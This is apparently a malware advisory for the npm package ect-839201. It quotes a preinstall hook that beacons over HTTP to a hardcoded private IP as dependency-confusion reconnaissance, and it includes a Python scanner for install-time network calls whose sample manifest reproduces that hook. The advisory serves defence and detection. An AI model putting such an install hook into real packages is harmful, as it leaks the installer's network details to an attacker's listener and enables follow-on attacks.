Malicious package: ect-839201 (npm)

Malicious code in ect-839201 (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-5720
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall ect-839201

What this malware does

package.json declares a preinstall lifecycle hook that runs node -e "require('http').get('http://10.107.121.85:8001/callback_839201')" on npm install. This unconditionally issues an HTTP GET to a hardcoded RFC1918 address (10.107.121.85:8001) over plaintext, with a path (/callback_839201) that encodes a unique per-package probe identifier. The behavior fires automatically as part of the install lifecycle with no opt-in. The combination of (a) a bare-IP, non-publisher destination, (b) a unique callback identifier matched to the package name, and (c) plaintext HTTP on an internal/private network is the canonical dependency-confusion reconnaissance beacon: it confirms reachability from the installer's network into an attacker-controlled listener and leaks the installer's source IP, install timing, and the fact that this specific probe package resolved inside the target environment. Even though the captured request body is empty, the install itself is the signal — successful callbacks identify victim networks for follow-on attacks.
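The pattern described above (an install lifecycle hook that performs a plaintext HTTP call to a bare RFC1918 address) can be checked for mechanically before a dependency is allowed into a build. The following scanner is an added example for this advisory, not O3 Security's or Amazon Inspector's tooling. It parses a package.json, inspects the hooks npm runs automatically (preinstall, install, postinstall, prepare), extracts any URLs from their inline command strings, and reports why each destination is suspicious. The SAMPLE_MANIFEST is constructed to reproduce the preinstall command quoted in this advisory; the real package's full manifest is not shown on this page.

```python
import ipaddress
import json
import re
import sys
from urllib.parse import urlparse

# Lifecycle hooks npm executes without any opt-in when a dependency is installed.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Rough matcher for URLs embedded in inline script bodies (node -e, curl, wget, ...).
URL_RE = re.compile(r"""https?://[^\s'")]+""", re.IGNORECASE)


def suspicious_reasons(url):
    """Return the list of reasons a URL found in a lifecycle hook is suspicious.

    Any network call at install time is reported; plaintext transport, a bare IP
    destination and a private (RFC1918/loopback/link-local) address each add a reason,
    matching the combination this advisory calls out.
    """
    reasons = ["network call in install lifecycle hook"]
    parsed = urlparse(url)
    host = parsed.hostname or ""
    if parsed.scheme.lower() == "http":
        reasons.append("plaintext HTTP")
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        addr = None  # hostname is a DNS name, not a literal IP
    if addr is not None:
        reasons.append("bare IP destination")
        if addr.is_private or addr.is_loopback or addr.is_link_local:
            reasons.append("RFC1918/private address")
    return reasons


def scan_package_json(text):
    """Parse a package.json document and return findings for install-time network calls."""
    manifest = json.loads(text)
    scripts = manifest.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        body = scripts.get(hook)
        if not isinstance(body, str):
            continue
        for url in URL_RE.findall(body):
            findings.append({"hook": hook, "url": url, "reasons": suspicious_reasons(url)})
    return findings


# Constructed manifest reproducing the preinstall hook quoted in the advisory.
SAMPLE_MANIFEST = json.dumps({
    "name": "ect-839201",
    "version": "100.0.0",
    "scripts": {
        "preinstall": "node -e \"require('http').get('http://10.107.121.85:8001/callback_839201')\"",
        "test": "echo ok",
    },
})

# Constructed benign manifest: a local build step, no network activity at install time.
BENIGN_MANIFEST = json.dumps({
    "name": "example-lib",
    "version": "1.2.3",
    "scripts": {"postinstall": "node scripts/build.js", "test": "jest"},
})


def main(argv):
    # Usage: python scan_hooks.py [path/to/package.json]; defaults to the sample.
    text = open(argv[1], encoding="utf-8").read() if len(argv) > 1 else SAMPLE_MANIFEST
    findings = scan_package_json(text)
    for f in findings:
        print(f"{f['hook']}: {f['url']} -> {', '.join(f['reasons'])}")
    return 1 if findings else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it against a package's manifest in CI before `npm install` (or point it at each package.json under node_modules after an install into a sandbox); a non-zero exit means at least one lifecycle hook reaches the network. A bare private IP plus plaintext HTTP in a preinstall hook, as here, is the signature the advisory describes and warrants blocking the package rather than merely logging it.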

Malicious versions

11 flagged
100.0.0, 100.0.1, 100.0.2, 100.0.3, 100.0.4, 100.0.5, 100.0.6, 100.0.7, 100.0.8, 100.0.9, 100.0.10

Indicators of compromise (SHA-256)
Frequently asked questions

No. ect-839201 on npm has been identified as a malicious package (versions 100.0.0, 100.0.1, 100.0.2, 100.0.3, 100.0.4, 100.0.5, 100.0.6, 100.0.7, and 3 more flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

  • IN-MAL-2026-006253
  • IN-MAL-2026-006259
  • IN-MAL-2026-006248
  • IN-MAL-2026-006257
  • IN-MAL-2026-006262
  • IN-MAL-2026-006263
  • IN-MAL-2026-006255
  • IN-MAL-2026-006260
  • IN-MAL-2026-006250
  • IN-MAL-2026-006246
  • IN-MAL-2026-006252

References

Credits

  • Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection